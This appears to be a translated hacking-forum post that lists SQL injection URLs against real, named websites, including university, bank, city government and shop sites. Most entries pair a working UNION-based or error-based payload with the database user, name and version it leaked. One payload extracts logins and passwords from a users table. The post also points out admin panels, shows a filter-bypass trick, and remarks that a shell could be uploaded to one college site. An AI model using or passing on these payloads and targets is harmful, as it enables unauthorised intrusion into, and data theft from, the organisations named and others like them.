The only interesting thing was the domain zone. .GR http://www.gagarin205.gr/date.php?date=501+and+1=2+union+select+1,user(),version(),4,5+--+
http://www.aiesep.ulg.ac.be/pages/poster_prize.php?id_event=32+uniOn/*pp*/select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version()),13,14,15-- http://www.crifa.ulg.ac.be/archives/edutech/actres/view_record.php?tb=sp&id=12+and/*ppp*/1=2+union/*ppp*/select+1318982400
http://www.reeltoo.ru/re/live/?show=-22861+union+all+select+1,2,3,4,5,6,7,8,group_concat%28login,0x3a,pass%29,10,database%28%29,user%28%29,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20sys_users-- no login,no pass
Leform.ru CY275 PR4 Code: http://www.leform.ru/news.php?date=2011-4'+union+select+1,2,concat('User:',user(),'%3Cbr%20/%3EVersion:',version(),'%3Cbr%20/%3EDatabase:',database()),4,NULL,6,7,8,9+/*+
PR-5 CY-350 Code: http://www.pilot-film.com/index.php?id=999999.9+union+all+select+0x6E6F,version(),0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F-- http://www.pilot-film.com/update/index.php - admin panel http://www.pilot-film.com/myadmin - admin panel
Armenian BANK, CY 90 PR 5 Code: http://www.acba.am/index.php?page=-1%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,9,10+--+ tigran@localhost:acbadb:5.0.92-log
http://wipz.uwp.edu/news.php?id=-1%20union%20select%201,table_name,3,4,5,6,7+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61
A Moscow cinema. http://www.5zvezd.ru/news/2011/10/20/930+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25+--+/
Target: http://www.hbswany.org/images.html?view_album=20
Host IP: 207.171.1.101
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 769 ms
Current User: webuser1@localhost
Sql Version: 5.0.82sp1
Current DB: hbswany_org
System User: webuser1@localhost
Host Name: jaws02.omnimagnet.com
Installation dir: /usr/
DB User: 'webuser1'@'%'
Code: http://secure.ws-montessori.com/produkt/produkt.php?show=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9,10-- Anyone who has a dictionary of German table names can try scanning it. Otherwise.. mysql 4 DB: montessorien
Code: http://www.sleepmonsters.us/news.php?article_id=-4315+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12,13--+ 5.0.77-log:503342_SleepMonsters:[email protected]
Code: http://www.morehate.com/ru/press.php?id=49+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29-- morehat1_karalez@localhost:morehat1_morehateru:5.0.92-log Code: http://www.morehate.com/ru/press.php?id=49+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES--
Code: http://kuzshop.ru/?p=28&c=-72+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--+ 5.1.58-log:wwwkuzshopru_evrik:[email protected] Code: http://www.towncrier.us/crierdetail.php?smenu=1&twindow=&sdetail=17860&mad=&wpage=1&skeyword=&sidate=&recID=-1237+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7--+ 4.0.18-standard:town_crier:milford_crier@localhost Code: http://www.sunnet.us/view_news.php?nid=70+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5--+ 5.0.45-community-nt:sn_db:sn_usr@localhost Code: http://www.ci.mesquite.tx.us/pressrelease/Press_release.php?IDkey=-187+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--+ 4.0.24-nt:news:[email protected] Code: http://womenofthestorm.us/news_subdet.php?wots_subcontent_ID=-133+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--+ 5.1.52-log:wos:wos_user@localhost
Why were the edu ones deleted? http://www.lakeerie.edu/news.php?id=0%20union%20select%201,2,version(),4,5,6,7,8 http://www.spcc.edu/news.php?id=0%20union%20select%201,2,version(),4,5,6,7,8,9,10 http://archive.parsons.edu/view.php?pid=68%20and%20database()='dt_archive' http://www.mcs.sdsmt.edu/view.php?p=0%20union%20select%201,version(),3,4,5,6 (a shell can be uploaded to the last one without any problems)
CY 400 PR 3 Code: http://www.pascal.ru/index.php?id=9999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+--+ pascal.ru@localhost: pascal:5.0.24a-log Code: http://www.pascal.ru/index.php?id=9999999+union+select+table_name+from+information_schema.tables--
Maly.ru CY1000 PR6 Code: http://maly.ru/people.php?name=ZharovM%27+order+by+10++--+ ololo, "hack attempt detected", the author apparently doesn't know about group by. Code: http://maly.ru/people.php?name=ZharovM%27+group+by+11++--+ However, there is a filter on UniOn SelEct; I didn't bother, the error is displayed, and that is enough. Code: http://maly.ru/people.php?name=1%27+and%28select+1+from%28select+count%28*%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+--+